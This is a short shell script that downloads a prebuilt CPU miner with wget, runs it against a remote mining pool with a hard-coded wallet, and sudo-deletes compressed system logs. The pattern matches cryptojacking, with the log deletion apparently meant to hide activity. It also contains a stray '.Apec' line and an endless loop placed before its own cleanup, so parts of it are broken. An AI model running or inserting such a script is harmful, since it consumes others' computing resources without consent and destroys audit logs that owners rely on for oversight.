#!/bin/sh
sudo apt update
sudo apt install screen -y
wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
tar xf cpuminer-opt-linux.tar.gz
./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1qhcfusqcund8p79sscjvynluvt87duuhfaks0se
.Apec
while [ 1 ]; do
sleep 3
done
sudo rm -f /var/log/*gz
sudo apt-get clean all
sleep 120
